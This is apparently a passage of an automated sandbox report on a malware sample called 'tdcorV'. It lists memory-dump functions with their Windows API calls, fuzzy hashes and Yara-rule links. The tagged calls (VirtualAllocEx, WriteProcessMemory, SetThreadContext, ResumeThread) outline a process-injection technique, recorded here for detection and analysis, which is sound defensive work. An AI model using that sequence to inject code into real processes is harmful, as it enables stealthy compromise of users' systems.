Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 070FAE5F

Memory Dump Source

Source File: 0000000A.00000002.1543484450.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_70f0000_tdcorV.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: b60c5723943338d45efcdf6fbd6a65dc5491c1139c7e769e8c6709d864528294
Instruction ID: a8d80bf857e46d4caf4fd1dedb90bddbc1a2af59c21e42fc189affe84fc4a04d
Opcode Fuzzy Hash: b60c5723943338d45efcdf6fbd6a65dc5491c1139c7e769e8c6709d864528294
Instruction Fuzzy Hash: 3B21C0B59003099FDB10CF9AD884A9EFBF5BB58314F14842AE919A7710D374A944CFA0

Function 0711E0F0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0711E180

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 19e6ebebfbefdc8f5d6eafa07559c9ea88e58e7d678a0f959c1979139dfc1faf
Instruction ID: bf3a1b4f494d2a318841c2f99e68e7af8442f6032534c063ada86fbcd8ea70de
Opcode Fuzzy Hash: 19e6ebebfbefdc8f5d6eafa07559c9ea88e58e7d678a0f959c1979139dfc1faf
Instruction Fuzzy Hash: 382125B1900349DFDB10CFAAC885BDEBBF5FF48310F14882AE918A7240C7789944CBA0

Function 0711E1D9 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0711E260

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c179ace35a58d22347a3b07bb91a53caaa597f3a3201ce59d2ac74f887dadf92
Instruction ID: d3378b23f3db88e160bc42713200d28b8ffef9e742f2693f9688c9e910bfe4d7
Opcode Fuzzy Hash: c179ace35a58d22347a3b07bb91a53caaa597f3a3201ce59d2ac74f887dadf92
Instruction Fuzzy Hash: C12116B1800349DFDB10DFAAD881BEEBBF5FF48310F14842AE919A7240C7799544CBA1

Function 0291CA10 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0291E8C6,?,?,?,?,?), ref: 0291E987

Memory Dump Source

Source File: 0000000A.00000002.1526887735.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2910000_tdcorV.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f93186a9e76b1c6bbdd79cbd8d0ba8542b8251b535a6cb532217b9040b71b075
Instruction ID: 1ae00f5bb46cb2fb471a5f626f35646d6fc0d46c3ab002b817c52579e8febc0c
Opcode Fuzzy Hash: f93186a9e76b1c6bbdd79cbd8d0ba8542b8251b535a6cb532217b9040b71b075
Instruction Fuzzy Hash: C921D2B590034CEFDB10CFAAD984ADEBBF8EB48310F14845AE958A7310D374A950CFA5

Function 0711DB19 Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0711DB9E

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: df68900f77c184c8806ba7f4ef22a3ac9988d537166536f4c29846f71bcc76fa
Instruction ID: 81514962110e0383d7fbe8ccc9ba034ca6dc949b8053498deb4f0c090a5c39b9
Opcode Fuzzy Hash: df68900f77c184c8806ba7f4ef22a3ac9988d537166536f4c29846f71bcc76fa
Instruction Fuzzy Hash: D7216AB1900309DFDB10DFAAC485BEEBBF4EF48314F148429D559AB280C7789645CF94

Function 0711E1E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0711E260

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b68a75ac885768b198c293bbcdb426cfd21e6861e175450444b44c2f19282b08
Instruction ID: bc03a5bbb188262baf844b8aa03b05499de698f4526d287f920812820f889c9d
Opcode Fuzzy Hash: b68a75ac885768b198c293bbcdb426cfd21e6861e175450444b44c2f19282b08
Instruction Fuzzy Hash: DE2114B1800349DFDB10CFAAC881BEEBBF5FF48310F14842AE918A7240C7799904CBA1

Function 0711DB20 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0711DB9E

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 953c84c03d121dde87decfbfd07534d2a7da46b995e8a0ca79118799726a7246
Instruction ID: dfeef132ff20b6cce11a72aacfd4a820dabfb9823b5e0909bbbfa3f5ca2992d3
Opcode Fuzzy Hash: 953c84c03d121dde87decfbfd07534d2a7da46b995e8a0ca79118799726a7246
Instruction Fuzzy Hash: 282149B19003099FDB10DFAAC4857EEBBF4EF49214F148429D559A7240C7789A45CFA5

Function 0711E028 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0711E09E

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 535b3dcee45242a802e4889e535e24b4c72efbb983f560f1166f80f33c718c9d
Instruction ID: e2bc339945442c9b73231590a3f6fe52159e0c4d2f064deea49710087019f008
Opcode Fuzzy Hash: 535b3dcee45242a802e4889e535e24b4c72efbb983f560f1166f80f33c718c9d
Instruction Fuzzy Hash: C9115972900249DFDB10CFAAC845BDFBBF5AB88310F148829D919A7250C7769505CFA1

Function 07113F40 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 07113FB8

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 80f430a563eacf5348e04d0266fab249dc5cc1df32080bab50ada83f932050fd
Instruction ID: 77be3990e99cf43a983e23ed50873aa8b1ac4f7e9ad12f69f850520b719f430f
Opcode Fuzzy Hash: 80f430a563eacf5348e04d0266fab249dc5cc1df32080bab50ada83f932050fd
Instruction Fuzzy Hash: 301144B5C0065A9BCB14CF9AD445BDEFBF4FB48310F14812AE828B7244C7346545CFA2

Function 0711E030 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0711E09E

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9a2dd14f1761285a43911ac79fd395acea4bbba5d54c22375d498b999ca14980
Instruction ID: 9cbf78671bab4b9f2a058fbd760cea0d697851c135f790f12154d5417d536234
Opcode Fuzzy Hash: 9a2dd14f1761285a43911ac79fd395acea4bbba5d54c22375d498b999ca14980
Instruction Fuzzy Hash: 46112672900349DFDB10DFAAC845BDFBBF5AB88310F148819E919A7250C7759544CFA1

Function 0711DA69 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0711DAD2

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ecaf2107fd7db06055c8ba48162b7545e821d1e10d3c37c6bf94df1098a4850f
Instruction ID: 5982cef6d2c7cbc56c874aa93c5625c0e923f0abba9b5a315590baa382f6e914
Opcode Fuzzy Hash: ecaf2107fd7db06055c8ba48162b7545e821d1e10d3c37c6bf94df1098a4850f
Instruction Fuzzy Hash: 831146B19003488FDB20DFAAD4457DEBBF4EB88620F24882AD519AB340CB796540CBA5

Function 07113F48 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

OutputDebugStringW.KERNELBASE(00000000), ref: 07113FB8

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: fbaea39938f5c611de061d7497b1277412f9bed11859941bc94847d953de8556
Instruction ID: bac87d6c239a504239f3cc5597d5a29a890a91ceddd780c0a4097065d6a2e3c0
Opcode Fuzzy Hash: fbaea39938f5c611de061d7497b1277412f9bed11859941bc94847d953de8556
Instruction Fuzzy Hash: 9C11F3B1C0065A9BDB14CF9AD544B9EFBF4FB48710F14812AE828A7344D774A944CFA5

Function 0711DA70 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0711DAD2

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4c4267fd2950b84f67aa82b8ad1d2bc67764da6df28fed0594f5e6fc7cb04f77
Instruction ID: e14b20001f25ccb13f8166dec8cc68c390af49648b23db89f5a455ab70f7561d
Opcode Fuzzy Hash: 4c4267fd2950b84f67aa82b8ad1d2bc67764da6df28fed0594f5e6fc7cb04f77
Instruction Fuzzy Hash: 671128B19047498BDB10DFAAD44579FFBF4AB88610F248429D519A7340C7796540CB95

Function 08AF1F11 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 08AF1F75

Memory Dump Source

Source File: 0000000A.00000002.1544244259.0000000008AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_8af0000_tdcorV.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 301110ef257b9a93aa1be0985cee8302ef09da35e98b8c304f5f543b16fcad50
Instruction ID: 3a1d7b8c82d67ca0c46d61e50a7024f2d5f96504dce6afe9784a1900cb5c076a
Opcode Fuzzy Hash: 301110ef257b9a93aa1be0985cee8302ef09da35e98b8c304f5f543b16fcad50
Instruction Fuzzy Hash: 2C11F5B5800349DFDB10CF9AD445BDEBFF8EB49324F20845AE918A7641C375A944CFA1

Function 0291C238 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0291C29E

Memory Dump Source

Source File: 0000000A.00000002.1526887735.0000000002910000.00000040.00000800.00020000.00000000.sdmp, Offset: 02910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2910000_tdcorV.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0f46a59afaffa7674ade868077e6cbcf54d23da43644d57ca9e693c41c5451f9
Instruction ID: 46aec7ab45d84c78a0ab73a63009513c8ad35bebf68ed5cade9eceeff6fdd481
Opcode Fuzzy Hash: 0f46a59afaffa7674ade868077e6cbcf54d23da43644d57ca9e693c41c5451f9
Instruction Fuzzy Hash: E611E0B6C00749CFDB14CF9AD444BDEFBF8AB88714F14846AD829A7610C379A545CFA2

Function 08AF005C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 08AF1F75

Memory Dump Source

Source File: 0000000A.00000002.1544244259.0000000008AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_8af0000_tdcorV.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 67407bf0098cfaa041f4c1a1eef9f175eeb7fae01eca1720368be88d547d31f7
Instruction ID: 6d96247999656295eee3890cb2efdb17697fb79af25a985aa61d1e588e74ff9e
Opcode Fuzzy Hash: 67407bf0098cfaa041f4c1a1eef9f175eeb7fae01eca1720368be88d547d31f7
Instruction Fuzzy Hash: 551103B5804748DFDB10DF9AC449BDEBBF8EB48320F14846AE918A7741C3B5A954CFA1

Function 07113FF0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 07114057

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6eaa67839e1e2eb3dffca0eb2bfd13d5614495fe2fa58a65ead80903b0251999
Instruction ID: f5c5feeeebc44454c39b7d00ebe32994c4432d75a2f00456daaba835703a8918
Opcode Fuzzy Hash: 6eaa67839e1e2eb3dffca0eb2bfd13d5614495fe2fa58a65ead80903b0251999
Instruction Fuzzy Hash: B11128B1800749CFDB20CF9AD445BEEBBF4EF48324F24846AD528A7240C778A545CFA5

Function 07113FF8 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 07114057

Memory Dump Source

Source File: 0000000A.00000002.1543592324.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7110000_tdcorV.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b0db90329dd23b2a5396d4a01ec7f276efd2a99d02ecabe2445a3db673c1d1f2
Instruction ID: e6e14729131ec694f19679ed906e2ba0b466c3a40f3e76e82e817a87ee7125ae
Opcode Fuzzy Hash: b0db90329dd23b2a5396d4a01ec7f276efd2a99d02ecabe2445a3db673c1d1f2
Instruction Fuzzy Hash: 131136B1800749CFDB10CF9AC445BDEFBF4EB48320F24846AD528A7240C378A544CFA5

Function 0558CC70 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4dd421c27441dee55aa235f5821e10b24954b168c5f1a7f4e82d27959108f351
Instruction ID: 47aea1bd0ea360c1a2a88a4416b9174ec048e157b15b4a74721941de72ccc9fe
Opcode Fuzzy Hash: 4dd421c27441dee55aa235f5821e10b24954b168c5f1a7f4e82d27959108f351
Instruction Fuzzy Hash: 5891DB3590060ADFCF14EFA8D854AADB7B1FF49304F108599D959B7215EB30AA85CF90

Function 0558C0BF Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df7f07fb1737a3cedf5f0fd69453b590f32f15605a0b5092b3e3c8b63dde61c4
Instruction ID: 8628176d520dd53ef4de499e062c0a0b1e68ba0d556e4fe021ff05d080c65165
Opcode Fuzzy Hash: df7f07fb1737a3cedf5f0fd69453b590f32f15605a0b5092b3e3c8b63dde61c4
Instruction Fuzzy Hash: 40512B75A00249DFDB14EFA8E494AEDB7B2FF89310F148169D806BB350DB34AC45CBA1

Function 0558C0D0 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db21aa9da586e192b77e82951595d4b2e7c90024ffe9fc000a9cd395bab3a1e6
Instruction ID: a97506a7ebfda4039d9a866e12885a9546d73ba6b85d88adf025e03e245b41f4
Opcode Fuzzy Hash: db21aa9da586e192b77e82951595d4b2e7c90024ffe9fc000a9cd395bab3a1e6
Instruction Fuzzy Hash: 7D511A75A00209DFDB14EFA9E894AEDB7B6FF88310F148169D806BB354DB35AC45CB60

Function 0558DEB0 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c26f1d26756ff1393e50d69ade113e4355611fbfcc69fe8f36606444a650b5
Instruction ID: 95f62e94e538f6db9780330137514796dcc3d7213608d9ecfadd7c884d83d80e
Opcode Fuzzy Hash: 54c26f1d26756ff1393e50d69ade113e4355611fbfcc69fe8f36606444a650b5
Instruction Fuzzy Hash: 3941E0317046108FDB1AB779A41867E37E7BFCAA00B1544A9D806DB395EF68DC029791

Function 0558E079 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7651539ba85c14d349ff6b8b3f2928bda348e9c7822a251be69ba809cb1de4c2
Instruction ID: a5dda01bccd9bdfdd2d69db22cffdef743790870781a1157c30f36eafb60b421
Opcode Fuzzy Hash: 7651539ba85c14d349ff6b8b3f2928bda348e9c7822a251be69ba809cb1de4c2
Instruction Fuzzy Hash: 6C417C307002058FEB14EBA9C885A6EB7F6FFC9604B248559D406EF765DB74FC428B90

Function 0558CAE0 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5491ffe25bb9dc64bfce0fefd5455eb8cac344c717777daaf9e6afbda36f021c
Instruction ID: daa17909d5a4886a95ee78b625c2dc43624612474ce53556b7c9fed4697aaa60
Opcode Fuzzy Hash: 5491ffe25bb9dc64bfce0fefd5455eb8cac344c717777daaf9e6afbda36f021c
Instruction Fuzzy Hash: 0E414B307102058FEB14EB69C885A7EB7F6FFC9A04B248569E406EB764DB74FC458B90

Function 0558FA10 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8472aaed291bec2743590bbba878453b6704e40bdb25aaada6f1e4932e8cfe49
Instruction ID: f5771c97ffd2806b8108768f661bb36362f4e73efb634fb69e3a200db7dfd84e
Opcode Fuzzy Hash: 8472aaed291bec2743590bbba878453b6704e40bdb25aaada6f1e4932e8cfe49
Instruction Fuzzy Hash: 02412D71A00209CFCB14DF69D4949AABBF5FF88310B14C669D819EB355EB34E945CFA0

Function 0558DC90 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d99879ade3799c3c3fcd313285e46898da94b98ac678b7b8e362b3cd35d642d
Instruction ID: bde21fb1e2b61d8156082a1fad67fd2d2d58f5dedfee298de2ae657b4a91ff7f
Opcode Fuzzy Hash: 4d99879ade3799c3c3fcd313285e46898da94b98ac678b7b8e362b3cd35d642d
Instruction Fuzzy Hash: B741E170A01608DFDB05EFB8D4546AEBBF2FF89700F148469E006AB391CB74AC46CB91

Function 0558F088 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c54c14ee4870a36a5a1faf5acc5b288195e050d7e92bc94b9537d748e9da20
Instruction ID: 003279096d24131acac2b2fb120710310f268aa296727c0ed4ac7a9e4ae7f9da
Opcode Fuzzy Hash: 55c54c14ee4870a36a5a1faf5acc5b288195e050d7e92bc94b9537d748e9da20
Instruction Fuzzy Hash: 78413031900219CFCF14EF68D8946E9B7B1FF89310F148299D959A7255EB30AD45CF90

Function 0558DC81 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8629e7f7f81849e48c16212c74398c30332b947d147071927aaf1e138f844b9
Instruction ID: 947b83a6993f7d60dc95c3e396ad027f1b6368dff854028e482e5f15e3568c59
Opcode Fuzzy Hash: d8629e7f7f81849e48c16212c74398c30332b947d147071927aaf1e138f844b9
Instruction Fuzzy Hash: F4415C70600609DFD714EFA8D885BAEB7F2FF88704F148529E41AAB394DB71A845CB91

Function 0558CB60 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd754e70bc935fd88cf5d822618afb626bd2fa3f520132ab8e85c06fde93eb3b
Instruction ID: 1a6865d58179ed54ea9e629ade5528b1506cd43c94c1c1336ee4b0fb71be411d
Opcode Fuzzy Hash: cd754e70bc935fd88cf5d822618afb626bd2fa3f520132ab8e85c06fde93eb3b
Instruction Fuzzy Hash: 3F315A307442098FEB14EFA4D859BFD7BF9BF89744F0404A8E406BB2A0DB719840CBA1

Function 0558EC52 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6781d7d57560bef571298f58ebc06485892c6831742e2a808840c827b1ce9a7e
Instruction ID: 2515408a5fd08d64f59ff63fb3be5c01767dc71ee1d705883ee740316e85a789
Opcode Fuzzy Hash: 6781d7d57560bef571298f58ebc06485892c6831742e2a808840c827b1ce9a7e
Instruction Fuzzy Hash: 3821E2307042118FC729BB29E855ABE7BBABFC5215B14847ED40ACB240DF30D802CB91

Function 0558E2D0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b0383541c747a413be0f10bbf6c79aad569fc301924017005875fc9494cca7f
Instruction ID: b1e8b035e371e9db0fff6f4a987f79b05956cd029adf0f5e04692a041924cd7b
Opcode Fuzzy Hash: 6b0383541c747a413be0f10bbf6c79aad569fc301924017005875fc9494cca7f
Instruction Fuzzy Hash: FB3145303006019FD718EB79E454A6AB7F6FF896157A4466DE00ADB3A1DF31EC02CB90

Function 0558E2C1 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0276de87f89fd209fd97da716bf7098ba7491b4edb6992696610adbcacbfcecb
Instruction ID: c01bd9e1b272f50cd9dd599a661b16a82697abcd5886251e38015b21bec47710
Opcode Fuzzy Hash: 0276de87f89fd209fd97da716bf7098ba7491b4edb6992696610adbcacbfcecb
Instruction Fuzzy Hash: BD21AC313006019FC318EB78E895A6AB7F6FF8961475441ADD00ADB3A1DF31EC02CB90

Function 00F8D544 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1526499436.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f8d000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca36b975365ea8c72bed04c28f71279ef62cd9add674b2b8bad87f0354b84a7
Instruction ID: d0e4bb9b5b4570f8ae32f2e6751a7cb07b341b84337437dd9f91d04e2a528d19
Opcode Fuzzy Hash: 0ca36b975365ea8c72bed04c28f71279ef62cd9add674b2b8bad87f0354b84a7
Instruction Fuzzy Hash: E2210872904244DFDB15EF14D9C0B56BB65FF84328F24C569E8090F286C336D856DBA2

Function 0558DC60 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1543002963.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5580000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f71312dc311daef3fc15cea62997673be691ad4f634ed203c1bd1c5919272809
Instruction ID: 1a26bd1cdbdea898724594539c1a24cb5f60a841014192fcfe27f33eb7e6d2a5
Opcode Fuzzy Hash: f71312dc311daef3fc15cea62997673be691ad4f634ed203c1bd1c5919272809
Instruction Fuzzy Hash: 6B318E70901209DFCB11EFA8D585AADBBF2FF48704F148569E009AB395DB75AC42CF90

Function 00F9D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1526562223.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_f9d000_tdcorV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 115df2a96bd26dcf2600dc12ce411c9d225d69739703b809a640b2ad26ac86c6
Instruction ID: 30e5fd854fa68d169ab25e9d2f7084a37439aa44d12d435d959c7a16d74fc24f
